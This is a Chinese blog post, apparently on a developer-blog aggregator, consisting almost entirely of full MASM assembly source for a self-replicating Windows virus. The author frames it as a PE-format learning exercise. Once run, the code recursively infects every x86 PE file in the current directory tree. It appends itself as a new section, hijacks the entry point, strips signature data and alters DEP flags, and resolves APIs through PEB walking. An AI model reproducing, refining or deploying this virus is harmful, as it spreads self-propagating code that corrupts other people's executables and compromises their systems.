_KaQqi
_KaQqi

写了一个添加节感染Intel X86 PE文件的程序(Virus)

为了加深一下PE文件的理解 就随手写了一个
其实ASM才是病毒的王道23333

不需要重定位 嘿嘿~

这个程序会感染当前目录以及所有子目录中的所有的Intel x86类型的PE文件

写的不是很好 大牛勿喷.


.686p
.model flat,stdcall
option casemap:none
include InfectPe.inc
.code
start:
	assume fs:nothing
	jmp Shell_
	;需要的变量
	Id				dd	0
	FileOep				dd	0
	JmpAddress			dd	0
	aShell				dd	0
	Kernel32			dd	0
	;需要的API地址
	_FindFirstFile			dd	0
	_FindNextFile			dd	0
	_LoadLibraryA			dd	0
	_CreateFileA			dd	0
	_MapViewOfFile			dd	0
	_CreateFileMappingA		dd	0
	_GetFileSize			dd	0
	_CloseHandle			dd	0
	_UnmapViewOfFile		dd	0
	_FindClose			dd	0
	_WriteFile			dd	0
	_MessageBox			dd	0
	_SetFilePointer			dd	0
	_VirtualAlloc			dd	0
	_VirtualFree			dd	0
	_GetCurrentDirectory		dd	0
	_SetTimer			dd	0
	_ReadFile			dd	0
	_Sleep				dd	0
	_KillTimer			dd	0
	NameOfKernel32			db	'kernel32.dll',0
	NameOfUser32			db	'user32.dll',0
	;API名字
	NameOfSleep			db	'Sleep',0
	NameOfKillTimer			db	'KillTimer',0
	NameOfSetTimer			db	'SetTimer',0
	NameOfReadFile			db	'ReadFile',0
	NameOfVirtualFree		db	'VirtualFree',0
	NameOfVirtualAlloc		db	'VirtualAlloc',0
	NameOfGetCurrentDirectory	db	'GetCurrentDirectoryA',0
	NameOfSetFilePointer		db	'SetFilePointer',0
	NameOfMessageBoxA		db	'MessageBoxA',0
	NameOfExitThread		db	'ExitProcess',0
	NameOfFindClose			db	'FindClose',0
	NameOfCreateFile		db	'CreateFileA',0
	NameOfMapViewOfFile		db	'MapViewOfFile',0
	NameOfCreateFileMappingA	db	'CreateFileMappingA',0
	NameOfGetFileSize		db	'GetFileSize',0
	NameOfCloseHandle		db	'CloseHandle',0
	NameOfUnmapViewOfFile		db	'UnmapViewOfFile',0
	NameOfFindFirstFile 		db	'FindFirstFileA',0
	NameOfWriteFile			db	'WriteFile',0
	NameOfFindNextFile		db	'FindNextFileA',0
	NameOfVirtualProtect		db	'VirtualProtect',0
	NameOfLoadLibraryA		db	'LoadLibraryA',0
	FileName			db	MAX_PATH dup(0)
	AddName				db	'\*.*',0
	AddName1			db	'\',0
	s				db	'.',0
	ss_				db	'..',0
	;Message
	db 'Hello World!',0dh,0ah
	db 'Coded by _KaQqi',0dh,0ah
	db '    11:28',0dh,0ah
	db '2017 - 2 - 7',0
Shell_:
	sub esp,4
	pushfd
	pushad
	call Shell
Shell:
	pop ebp ;Shell的地址
	sub ebp,Shell - start ;程序的起始地址
	;设置SEH链
	xor eax,eax
	xor eax,SehCallBack - start
	add eax,ebp
	sub esp,4
	xor edx,edx
	xor edx,dword ptr ss:[esp]
	xor dword ptr ss:[esp],edx
	xor dword ptr ss:[esp],eax
	sub esp,4
	xor eax,eax
	xor eax,dword ptr fs:[0]
	xor edx,edx
	xor edx,dword ptr ss:[esp]
	xor dword ptr ss:[esp],edx
	xor dword ptr ss:[esp],eax
	xor edx,edx
	xor edx,dword ptr fs:[0]
	xor dword ptr fs:[0],edx
	xor dword ptr fs:[0],esp
	;初始化
	push ebp
	call SHELLPAGE_EXECUTE_READWRITE
	mov [aShell - start + ebp],ebp
	call GetKernelBase
	mov eax,ebp
	add eax,NameOfLoadLibraryA - start
	push eax
	call GetKernelBase
	push eax
	call ShellGetProcAddress
	mov [_LoadLibraryA - start + ebp],eax
	mov eax,ebp
	add eax,NameOfKernel32 - start
	push eax
	mov eax,[_LoadLibraryA - start + ebp]
	call eax
	mov [Kernel32 - start + ebp],eax
	mov eax,ebp
	add eax,NameOfFindFirstFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_FindFirstFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfFindNextFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_FindNextFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfCreateFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_CreateFileA - start + ebp],eax
	mov eax,ebp
	add eax,NameOfGetFileSize - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_GetFileSize - start + ebp],eax
	mov eax,ebp
	add eax,NameOfCreateFileMappingA - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_CreateFileMappingA - start + ebp],eax
	mov eax,ebp
	add eax,NameOfMapViewOfFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_MapViewOfFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfUnmapViewOfFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_UnmapViewOfFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfCloseHandle - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_CloseHandle - start + ebp],eax
	mov eax,ebp
	add eax,NameOfFindClose - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_FindClose - start + ebp],eax
	mov eax,ebp
	add eax,NameOfMessageBoxA - start
	push eax
	mov eax,ebp
	add eax,NameOfUser32 - start
	push eax
	call dword ptr cs:[_LoadLibraryA - start + ebp]
	push eax
	call ShellGetProcAddress
	mov [_MessageBox - start + ebp],eax
	mov eax,ebp
	add eax,NameOfWriteFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_WriteFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfSetFilePointer - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_SetFilePointer - start + ebp],eax
	mov eax,ebp
	add eax,NameOfGetCurrentDirectory - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_GetCurrentDirectory - start + ebp],eax
	mov eax,ebp
	add eax,NameOfVirtualAlloc - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_VirtualAlloc - start + ebp],eax
	mov eax,ebp
	add eax,NameOfVirtualFree - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_VirtualFree - start + ebp],eax
	mov eax,ebp
	add eax,NameOfReadFile - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_ReadFile - start + ebp],eax
	mov eax,ebp
	add eax,NameOfSleep - start
	push eax
	push [Kernel32 - start + ebp]
	call ShellGetProcAddress
	mov [_Sleep - start + ebp],eax
	mov eax,ebp
	add eax,NameOfSetTimer - start
	push eax
	mov eax,ebp
	add eax,NameOfUser32 - start
	push eax
	call dword ptr cs:[_LoadLibraryA - start + ebp]
	push eax
	call ShellGetProcAddress
	mov [_SetTimer - start + ebp],eax
	mov eax,ebp
	add eax,NameOfKillTimer - start
	push eax
	mov eax,ebp
	add eax,NameOfUser32 - start
	push eax
	call dword ptr cs:[_LoadLibraryA - start + ebp]
	push eax
	call ShellGetProcAddress
	mov [_KillTimer - start + ebp],eax
	call ShellStart
	;准备返回
	mov eax,dword ptr cs:[FileOep - start + ebp]
	.if eax == NULL
		mov eax,ebp
		add eax,NameOfExitThread - start
		push eax
		push [Kernel32 - start + ebp]
		call ShellGetProcAddress
		mov [JmpAddress - start + ebp],eax
		push MB_OK
		push NULL
		lea eax,[END_MSG - start + ebp]
		push eax
		push NULL
		call dword ptr cs:[_MessageBox - start + ebp]
	.else
		;取出当前进程的ImageBase
		mov eax,dword ptr fs:[30h]
		mov eax,dword ptr ds:[eax + 8h]
		;得到OEP
		add eax,dword ptr cs:[FileOep - start + ebp]
		mov [JmpAddress - start + ebp],eax
	.endif
	;恢复SEH链
	xor edx,edx
	xor edx,dword ptr fs:[0]
	xor dword ptr fs:[0],edx
	xor edx,edx
	xor edx,dword ptr ss:[esp]
	xor dword ptr fs:[0],edx
	add esp,8
	add esp,40
	push dword ptr cs:[JmpAddress - start + ebp]
	sub esp,36
	popad
	popfd
	retn;返回
SehCallBack proc
	assume ebx:ptr CONTEXT
	mov ebx,dword ptr ss:[esp + 12] ;PCONTEXT参数
	xor eax,eax
	retn 16
SehCallBack endp
RtlGetAnsiStringLength proc lpString:DWORD
	LOCAL i:DWORD
	mov eax,i
	xor i,eax
	pushad
	mov edi,lpString
	mov eax,i
	jmp @
_Loop:
	inc i
	mov eax,i
@:
	cmp byte ptr ds:[edi + eax],NULL
	jnz _Loop
	popad
	mov eax,i
	ret
RtlGetAnsiStringLength endp
RtlCompareAnsiString proc ;比较两个ANSI字符串 相等返回1 不相等返回0 (stdcall)
	mov esi,dword ptr ss:[esp + 4]
	mov edi,dword ptr ss:[esp + 8]
	push ecx
	push esi
	call RtlGetAnsiStringLength
	push eax
	push edi
	call RtlGetAnsiStringLength
	mov ecx,eax
	pop eax
	xor eax,ecx
	cmove eax,ecx
	xor ebx,ebx
	xor ecx,eax
	mov ecx,eax
	cmovnz ecx,ebx
	repe cmpsb
	pushfd
	xor ebx,ebx
	inc ebx
	xor eax,eax
	popfd
	cmove eax,ebx
	pop ecx
	retn 8
RtlCompareAnsiString endp
ShellGetProcAddress proc hModule:DWORD,lpBuffer:DWORD
	LOCAL i:DWORD
	mov esi,hModule
	assume esi:ptr IMAGE_DOS_HEADER
	add esi,[esi].e_lfanew
	assume esi:ptr IMAGE_NT_HEADERS32
	mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
	add esi,hModule
	assume esi:ptr IMAGE_EXPORT_DIRECTORY
	mov ecx,[esi].NumberOfNames ;导出函数的名字的个数
	mov edx,[esi].AddressOfNames
	add edx,hModule
	push esi
	mov i,0
_Loop:
	mov eax,i
	mov edi,dword ptr ds:[edx + eax * sizeof DWORD]
	add edi,hModule
	push edi
	push lpBuffer
	call RtlCompareAnsiString
	and eax,eax
	pushfd
	xor ebx,ebx
	popfd
	mov eax,ecx
	cmovnz ecx,ebx
	inc i ;计数
	test ecx,ecx
	jnz _Loop
	pop esi
	;得到导出函数序号
	mov edx,eax
	xor eax,eax
	mov ecx,[esi].NumberOfNames
	xor ecx,i
	je Return
	mov ecx,i
	mov edx,[esi].AddressOfNameOrdinals
	add edx,hModule
	xor eax,eax
	mov ax,word ptr ds:[edx + ecx * sizeof WORD]
	;取出导出函数的RVA
	dec eax
	mov edx,[esi].AddressOfFunctions
	add edx,hModule
	mov eax,dword ptr ds:[edx + eax * sizeof DWORD]
	;得到地址
	add eax,hModule
Return:
	assume esi:nothing
	ret
ShellGetProcAddress endp
SHELLPAGE_EXECUTE_READWRITE proc hModule:DWORD;修改代码段的权限为PAGE_EXECUTE_READWRITE
	LOCAL Old:DWORD
	mov eax,hModule
	add eax,NameOfVirtualProtect - start
	push eax
	call GetKernelBase
	push eax
	call ShellGetProcAddress
	lea edx,Old
	push edx
	push PAGE_EXECUTE_READWRITE
	push Shell_ - start
	push hModule
	call eax
	ret
SHELLPAGE_EXECUTE_READWRITE endp
GetKernelBase proc
	;摘自网络
	cld 
	xor edx,edx 
	mov edx,dword ptr fs:[edx + 30h]
	mov edx,dword ptr ds:[edx + 0Ch]
	mov edx,dword ptr ds:[edx + 14h]
next_mod:
	mov esi,dword ptr ds:[edx + 28h]
	push 24
	pop ecx
	xor edi,edi
loop_modname:
	xor eax,eax 
	lodsb 
	cmp al,'a'
	jl not_lowercase
	sub al,20h
not_lowercase:
	ror edi,13
	add edi,eax
	loop loop_modname 
	cmp edi,6A4ABC5Bh
	mov ebx,dword ptr ds:[edx + 10h]
	mov edx,dword ptr ds:[edx]
	jnz next_mod
	mov eax,ebx
	ret
GetKernelBase endp
ShellStart proc;Shell入口
	mov eax,ebp
	add eax,ThreadCallBack - start
	push eax
	push 1
	push 2017h
	push NULL
	call dword ptr cs:[_SetTimer - start + ebp]
	mov dword ptr ds:[Id - start + ebp],eax
	;延时
	push 500
	call dword ptr cs:[_Sleep - start + ebp]
	ret
ShellStart endp
ThreadCallBack proc
	call CallNext
CallNext: ;得到Shell入口
	pop edx
	sub edx,5
	sub edx,ThreadCallBack - start
	;销毁定时器
	push edx
	push dword ptr ds:[Id - start + edx]
	push NULL
	call dword ptr cs:[_KillTimer - start + edx]
	pop edx
	;先感染当前目录
	;获取当前程序的目录
	push edx
	push edx
	mov eax,FileName - start
	add eax,edx
	push eax
	push sizeof FileName
	call dword ptr cs:[_GetCurrentDirectory - start + edx]
	pop edx
	lea eax,MyFileCallBack
	sub eax,start
	add eax,edx
	push eax ;回调函数
	lea eax,[FileName - start + edx]
	push eax
	push edx
	call ShellFindFile
	pop edx
	ret
ThreadCallBack endp
_ZeroMemory proc Destination:DWORD,MemoryLength:DWORD
	pushad
	mov edx,Destination
	xor ecx,ecx
	.while ecx != MemoryLength
		mov al,byte ptr ds:[edx + ecx]
		xor byte ptr ds:[edx + ecx],al
		inc ecx
	.endw
	popad
	ret
_ZeroMemory endp
ShellFindFile proc hModule:DWORD,lpFileNameString:DWORD,CallBackFunction:DWORD
	LOCAL FindFileData:WIN32_FIND_DATA
	LOCAL FindHandle:DWORD
	LOCAL MyBool:BOOL
	LOCAL MyFile[MAX_PATH]:CHAR
	LOCAL File[MAX_PATH]:CHAR
	LOCAL MyFile1[MAX_PATH]:CHAR
	;指明通配符
	push lpFileNameString
	call RtlGetAnsiStringLength
	push eax ;长度
	push lpFileNameString
	lea eax,MyFile1
	push eax
	call RtlCopyAnsiString
	mov eax,hModule
	add eax,AddName - start
	push eax
	lea eax,MyFile1
	push eax
	call RtlAddAnsiString
	;第一个
	lea eax,FindFileData
	push eax
	lea eax,MyFile1
	push eax
	mov eax,hModule
	call dword ptr cs:[_FindFirstFile - start + eax]
	.if eax != INVALID_HANDLE_VALUE
		mov FindHandle,eax
		.repeat
			assume edx:ptr WIN32_FIND_DATA
			;过滤掉上一级目录
			lea edx,FindFileData
			lea ebx,[edx].cFileName
			mov eax,hModule
			add eax,s - start
			push eax
			push ebx
			call RtlCompareAnsiString
			xor eax,1
			je Next
			lea edx,FindFileData
			lea ebx,[edx].cFileName
			mov eax,hModule
			add eax,ss_ - start
			push eax
			push ebx
			call RtlCompareAnsiString
			xor eax,1
			je Next
			lea edx,FindFileData
			mov eax,[edx].dwFileAttributes
			and eax,FILE_ATTRIBUTE_DIRECTORY
			.if eax != NULL ;目录
				;下一个扫描路径
				push lpFileNameString
				call RtlGetAnsiStringLength
				push eax ;长度
				push lpFileNameString
				lea eax,File
				push eax
				call RtlCopyAnsiString
				mov eax,hModule
				add eax,AddName1 - start
				push eax
				lea eax,File
				push eax
				call RtlAddAnsiString
				lea edx,FindFileData
				lea eax,[edx].cFileName
				push eax
				lea eax,File
				push eax
				call RtlAddAnsiString
				push CallBackFunction
				lea eax,File
				push eax
				push hModule
				call ShellFindFile
			.else ;回调函数
				push lpFileNameString
				call RtlGetAnsiStringLength
				push eax ;长度
				push lpFileNameString
				lea eax,MyFile
				push eax
				call RtlCopyAnsiString	
				mov eax,hModule
				add eax,AddName1 - start
				push eax
				lea eax,MyFile
				push eax
				call RtlAddAnsiString
				lea edx,FindFileData
				lea eax,[edx].cFileName
				push eax
				lea eax,MyFile
				push eax
				call RtlAddAnsiString
				lea eax,MyFile
				push eax
				push hModule
				call CallBackFunction
			.endif
			assume edx:nothing
Next: ;循环尾
			lea eax,FindFileData
			push eax
			push FindHandle
			mov eax,hModule
			call dword ptr cs:[_FindNextFile - start + eax]
			mov MyBool,eax
		.until MyBool == FALSE
	.endif
RetNext:
	;返回
	push FindHandle
	mov eax,hModule
	call dword ptr cs:[_FindClose - start + eax]
	ret
ShellFindFile endp
MyFileCallBack proc hModule:DWORD,lpFileNameString:DWORD ;枚举文件的回调函数
	;感染文件
	LOCAL Written:DWORD
	LOCAL dwFileSize:DWORD
	LOCAL hFile:DWORD
	LOCAL hMap:DWORD
	LOCAL lpBuffer:DWORD
	LOCAL SectionAlignment:DWORD
	LOCAL FileAlignment:DWORD
	LOCAL nSec:WORD ;区块个数
	LOCAL PointerToRawData:DWORD
	LOCAL VirtualAddress:DWORD
	LOCAL dwShellSize:DWORD
	LOCAL AddressOfEntryPoint:DWORD ;入口点
	LOCAL IsShell:DWORD ;是否是本体
	LOCAL Overlay:DWORD ;附加数据
	LOCAL SizeOfOverlay:DWORD ;附加数据大小
	LOCAL Read:DWORD
	mov Overlay,NULL
	;获取Shell的大小
	mov eax,END_
	sub eax,start
	mov dwShellSize,eax
	;打开lpFileNameString指向的文件
	push NULL
	push FILE_ATTRIBUTE_NORMAL
	push OPEN_EXISTING
	push NULL
	push FILE_SHARE_READ
	mov eax,GENERIC_READ
	or eax,GENERIC_WRITE
	push eax
	push lpFileNameString
	mov eax,hModule
	call dword ptr cs:[_CreateFileA - start + eax]
	cmp eax,INVALID_HANDLE_VALUE
	je Exit_Ret
	mov hFile,eax ;文件句柄
	;获取文件的长度
	push NULL
	push eax
	mov eax,hModule
	call dword ptr cs:[_GetFileSize - start + eax]
	or eax,eax
	je Closed
	mov dwFileSize,eax
	;创建文件映射
	push NULL
	push dwFileSize
	push NULL
	push PAGE_READWRITE
	push NULL
	push hFile
	mov eax,hModule
	call dword ptr cs:[_CreateFileMappingA - start + eax]
	cmp eax,INVALID_HANDLE_VALUE
	je Closed
	mov hMap,eax
	;将文件映射到内存
	push dwFileSize
	push NULL
	push NULL
	mov eax,FILE_MAP_READ
	or eax,FILE_MAP_WRITE
	push eax
	push hMap
	mov eax,hModule
	call dword ptr cs:[_MapViewOfFile - start + eax]
	or eax,eax
	je CloseFileMapping
	mov lpBuffer,eax
	;PE文件?
	assume esi:ptr IMAGE_DOS_HEADER
	mov esi,lpBuffer
	cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
	jnz __UnMapViewOfFile
	mov esi,lpBuffer
	add esi,[esi].e_lfanew
	assume esi:ptr IMAGE_NT_HEADERS32
	cmp [esi].Signature,IMAGE_NT_SIGNATURE
	jnz __UnMapViewOfFile
	;Intel x86 PE文件?
	cmp [esi].FileHeader.Machine,IMAGE_FILE_MACHINE_I386
	jnz __UnMapViewOfFile
	push esi
	push lpBuffer
	push hModule
	call IsInfected
	or eax,eax
	jnz __UnMapViewOfFile
	;PE文件区块个数
	mov ax,[esi].FileHeader.NumberOfSections
	mov nSec,ax
	or ax,ax
	je __UnMapViewOfFile
	;检测附加数据
	assume edi:ptr IMAGE_SECTION_HEADER
	lea edi,[esi].OptionalHeader
	xor eax,eax
	mov ax,[esi].FileHeader.SizeOfOptionalHeader
	add edi,eax
	xor eax,eax
	mov ax,nSec
	dec ax
	mov ebx,sizeof IMAGE_SECTION_HEADER
	mul ebx
	add edi,eax ;定位到最后一个区块
	mov eax,[edi].PointerToRawData
	add eax,[edi].SizeOfRawData
	.if eax < dwFileSize ;存在附加数据
		mov ebx,dwFileSize
		sub ebx,eax
		mov SizeOfOverlay,ebx
		;申请一块内存
		push PAGE_EXECUTE_READWRITE
		push MEM_COMMIT
		push SizeOfOverlay
		push NULL
		mov eax,hModule
		call dword ptr cs:[_VirtualAlloc - start + eax]
		mov Overlay,eax
		mov edx,[edi].PointerToRawData
		add edx,[edi].SizeOfRawData
		;移动到附加数据处
		push FILE_BEGIN
		push NULL
		push edx
		push hFile
		mov edx,hModule
		call dword ptr cs:[_SetFilePointer - start + edx]
		;保存附加数据
		push NULL
		lea eax,Read
		push eax
		push SizeOfOverlay
		push Overlay
		push hFile
		mov edx,hModule
		call dword ptr cs:[_ReadFile - start + edx]
	.endif
	;PE文件入口点
	mov eax,[esi].OptionalHeader.AddressOfEntryPoint
	mov AddressOfEntryPoint,eax
	;清除绑定输入表
	lea edi,[esi].OptionalHeader.DataDirectory
	lea edi,[edi + IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT * sizeof IMAGE_DATA_DIRECTORY]
	assume edi:ptr IMAGE_DATA_DIRECTORY
	xor eax,eax
	mov [edi].VirtualAddress,eax
	mov [edi].isize,eax
	;数字签名
	lea edi,[esi].OptionalHeader.DataDirectory
	lea edi,[edi + IMAGE_DIRECTORY_ENTRY_SECURITY * sizeof IMAGE_DATA_DIRECTORY]
	.if [edi].VirtualAddress != NULL
		;去掉DEP
		mov ax,[esi].OptionalHeader.DllCharacteristics
		and ax,IMAGE_DLLCHARACTERISTICS_NX_COMPAT
		mov [esi].OptionalHeader.DllCharacteristics,ax
	.endif
	xor eax,eax
	mov [edi].VirtualAddress,eax
	mov [edi].isize,eax
	;异常目录
	lea edi,[esi].OptionalHeader.DataDirectory
	lea edi,[edi + IMAGE_DIRECTORY_ENTRY_EXCEPTION * sizeof IMAGE_DATA_DIRECTORY]
	xor eax,eax
	mov [edi].VirtualAddress,eax
	mov [edi].isize,eax
	;PE对齐值
	mov eax,[esi].OptionalHeader.SectionAlignment
	mov SectionAlignment,eax
	mov eax,[esi].OptionalHeader.FileAlignment
	mov FileAlignment,eax
	;PE文件区块表
	assume edi:ptr IMAGE_SECTION_HEADER
	lea edi,[esi].OptionalHeader
	xor eax,eax
	mov ax,[esi].FileHeader.SizeOfOptionalHeader
	add edi,eax
	;最后一个
	xor eax,eax
	mov ax,nSec
	mov ebx,sizeof IMAGE_SECTION_HEADER
	mul ebx
	add edi,eax
	;清零
	push sizeof IMAGE_SECTION_HEADER
	push edi
	call _ZeroMemory
	;前一个区块
	mov eax,sizeof IMAGE_SECTION_HEADER
	sub edi,eax
	mov eax,[edi].PointerToRawData
	add eax,[edi].SizeOfRawData
	mov PointerToRawData,eax ;新区块的PointerToRawData
	mov eax,[edi].VirtualAddress
	add eax,[edi].Misc.VirtualSize
	mov VirtualAddress,eax ;新区块的VirtualAddress
	;后一个区块
	mov eax,sizeof IMAGE_SECTION_HEADER
	add edi,eax
	;对齐后的PointerToRawData
	push FileAlignment
	push PointerToRawData
	call PeAlign
	mov [edi].PointerToRawData,eax
	;对齐后的VirtualAddress
	push SectionAlignment
	push VirtualAddress
	call PeAlign
	mov [edi].VirtualAddress,eax
	;对齐后的SizeOfRawData
	push FileAlignment
	push dwShellSize
	call PeAlign
	mov [edi].SizeOfRawData,eax
	;对齐后的VirtualSize
	push SectionAlignment
	push dwShellSize
	call PeAlign
	mov [edi].Misc.VirtualSize,eax
	;保存对齐后的SizeOfRawData
	push FileAlignment
	push dwShellSize
	call PeAlign
	mov dwShellSize,eax
	;新区块的属性
	mov [edi].Characteristics,60000020h
	;新区块的名字
	rdtsc
	or eax,edx
	lea edx,[edi].Name1
	mov dword ptr ds:[edx],eax
	;对齐
	mov eax,[edi].VirtualAddress
	add eax,[edi].Misc.VirtualSize
	push SectionAlignment
	push eax
	call PeAlign
	mov [esi].OptionalHeader.SizeOfImage,eax
	inc [esi].FileHeader.NumberOfSections ;增加一个区块
	;更新入口点
	mov eax,hModule
	add eax,FileOep - start
	.if eax == NULL
		mov eax,AddressOfEntryPoint
		mov edx,hModule
		add edx,FileOep - start
		mov dword ptr ds:[edx],eax
	.else
		mov IsShell,12345678h
		mov eax,hModule
		add eax,FileOep - start
		push dword ptr ds:[eax] ;保存原OEP偏移
		mov eax,AddressOfEntryPoint
		mov edx,hModule
		add edx,FileOep - start
		mov dword ptr ds:[edx],eax
	.endif
	;移动到PointerToRawData处
	push FILE_BEGIN
	push NULL
	push PointerToRawData
	push hFile
	mov edx,hModule
	call dword ptr cs:[_SetFilePointer - start + edx]
	;把Shell写入文件
	push NULL
	lea eax,Written
	push eax
	push dwShellSize
	push hModule
	push hFile
	mov edx,hModule
	call dword ptr cs:[_WriteFile - start + edx]
	.if IsShell == 12345678h
		xor IsShell,12345678h
		mov eax,hModule
		add eax,FileOep - start
		pop dword ptr ds:[eax] ;恢复原OEP偏移
	.endif
	;更新入口点
	push SectionAlignment
	push VirtualAddress
	call PeAlign
	mov [esi].OptionalHeader.AddressOfEntryPoint,eax
	;写入附加数据
	.if Overlay != NULL
		;移动到文件尾
		push FILE_END
		push NULL
		push NULL
		push hFile
		mov edx,hModule
		call dword ptr cs:[_SetFilePointer - start + edx]
		;把附加数据写入文件
		push NULL
		lea eax,Written
		push eax
		push SizeOfOverlay
		push Overlay
		push hFile
		mov edx,hModule
		call dword ptr cs:[_WriteFile - start + edx]
		;释放内存
		push MEM_DECOMMIT
		push SizeOfOverlay
		push Overlay
		mov eax,hModule
		call dword ptr cs:[_VirtualFree - start + eax]
		mov Overlay,NULL
	.endif
	assume edi:nothing
	assume esi:nothing
	jmp __UnMapViewOfFile
__UnMapViewOfFile:
	;关闭文件映射
	push lpBuffer
	mov eax,hModule
	call dword ptr cs:[_UnmapViewOfFile - start + eax]
	jmp CloseFileMapping
CloseFileMapping:
	push hMap
	mov eax,hModule
	call dword ptr cs:[_CloseHandle - start + eax]
Closed:
	push hFile
	mov eax,hModule
	call dword ptr cs:[_CloseHandle - start + eax]
	jmp Exit_Ret
Exit_Ret:
	ret
MyFileCallBack endp
PeAlign proc Number:DWORD,dwAlign:DWORD
	mov ecx,dwAlign
	mov eax,Number
	xor edx,edx
	div ecx
	or edx,edx
	je Aligned
	inc eax
Aligned:
	mul ecx
	ret
PeAlign endp
RtlCopyAnsiString proc lpString:DWORD,lpString1:DWORD,dwLength:DWORD
	mov edi,lpString
	mov esi,lpString1
	mov ecx,dwLength
	rep movsb
	mov ecx,dwLength
	add ecx,lpString
	mov byte ptr ds:[ecx],0
	ret
RtlCopyAnsiString endp
RtlAddAnsiString proc lpString:DWORD,lpString1:DWORD
	LOCAL len:DWORD
	pushad
	push lpString
	call RtlGetAnsiStringLength
	push eax
	push lpString1
	call RtlGetAnsiStringLength
	mov len,eax
	pop eax
	add lpString,eax
	mov edi,lpString
	mov esi,lpString1
	mov ecx,len
	rep movsb
	mov edi,lpString
	add edi,len
	mov byte ptr ds:[edi],0
	popad
	ret
RtlAddAnsiString endp
RtlCompareMemoryByBytes proc lpBuffer:DWORD,lpBuffer1:DWORD,dwSize:DWORD ;比较两个内存 不相等返回0
	pushad
	xor eax,eax
	mov ecx,dwSize
	mov edi,lpBuffer
	mov esi,lpBuffer1
	repe cmpsb
	pushfd
	pushfd
	xor edx,edx
	popfd
	xor ecx,edx
	pushfd
	inc edx
	popfd
	cmove eax,edx
	xor edx,edx
	popfd
	popad
	cmovnz eax,edx
	ret
RtlCompareMemoryByBytes endp
IsInfected proc hModule:DWORD,lpBuffer:DWORD,pNtHeaders32:DWORD
	LOCAL dwReturn:DWORD
	LOCAL Oep:DWORD
	LOCAL Oep_VA:DWORD
	LOCAL nSec:WORD
	LOCAL FileAlignment:DWORD
	assume esi:ptr IMAGE_NT_HEADERS32
	mov esi,pNtHeaders32
	.if [esi].Signature != IMAGE_NT_SIGNATURE ;不是PE文件
		jmp Fail
Fail:
		mov eax,dwReturn
		xor dwReturn,eax
		jmp Return
	.endif
	;不是Intel x86的PE文件
	cmp [esi].FileHeader.Machine,IMAGE_FILE_MACHINE_I386
	jnz Fail
	;文件对齐值
	mov eax,[esi].OptionalHeader.FileAlignment
	mov FileAlignment,eax
	;区块个数
	mov ax,[esi].FileHeader.NumberOfSections
	mov nSec,ax
	;取出OEP
	mov eax,[esi].OptionalHeader.AddressOfEntryPoint
	mov Oep,eax
	;计算出OEP在文件中的偏移
	assume edi:ptr IMAGE_SECTION_HEADER
	;找出EP区段
	lea edi,[esi].OptionalHeader
	xor eax,eax
	mov ax,[esi].FileHeader.SizeOfOptionalHeader
	add edi,eax
	xor eax,eax
	.repeat
		mov ebx,[edi].VirtualAddress
		.if Oep >= ebx
			add ebx,[edi].Misc.VirtualSize
			cmp ebx,Oep
			ja Next
		.endif
		add edi,sizeof IMAGE_SECTION_HEADER
		inc ax
	.until ax >= nSec
Next:
	;RVA -> RAW
	push FileAlignment
	push [edi].PointerToRawData
	call PeAlign
	mov ebx,[edi].VirtualAddress
	sub ebx,Oep
	neg ebx
	add eax,ebx
	mov Oep,eax
	mov Oep_VA,eax
	mov eax,lpBuffer
	add Oep_VA,eax
	;和Shell对比 不相等就说明没被感染
	push 5
	push Oep_VA
	push hModule
	call RtlCompareMemoryByBytes ;比较前五个字节
	or eax,eax
	je Fail
	;剩下的代码
	add Oep_VA,Shell_ - start
	add hModule,Shell_ - start
	push END_ - Shell_
	push Oep_VA
	push hModule
	call RtlCompareMemoryByBytes ;比较剩下的代码
	or eax,eax
	je Fail
	mov dwReturn,1
	assume edi:nothing
	assume esi:nothing
	jmp Return
Return:
	xor eax,eax
	xor eax,dwReturn
	ret
IsInfected endp
END_MSG:
	db 'File corrupted!. This program has been manipulated and maybe',0ah,0dh
	db 'it is infected by a Virus or cracked. This file will not work anymore.',0
END_:
	retf
end start
end


你可能感兴趣的:(PE文件)

  • 机器学习与深度学习间关系与区别 ℒℴѵℯ心·动ꦿ໊ོ꫞ 人工智能学习深度学习python
    一、机器学习概述定义机器学习(MachineLearning,ML)是一种通过数据驱动的方法,利用统计学和计算算法来训练模型,使计算机能够从数据中学习并自动进行预测或决策。机器学习通过分析大量数据样本,识别其中的模式和规律,从而对新的数据进行判断。其核心在于通过训练过程,让模型不断优化和提升其预测准确性。主要类型1.监督学习(SupervisedLearning)监督学习是指在训练数据集中包含输入
  • android系统selinux中添加新属性property 辉色投像
    1.定位/android/system/sepolicy/private/property_contexts声明属性开头:persist.charge声明属性类型:u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
  • OC语言多界面传值五大方式 Magnetic_h iosui学习objective-c开发语言
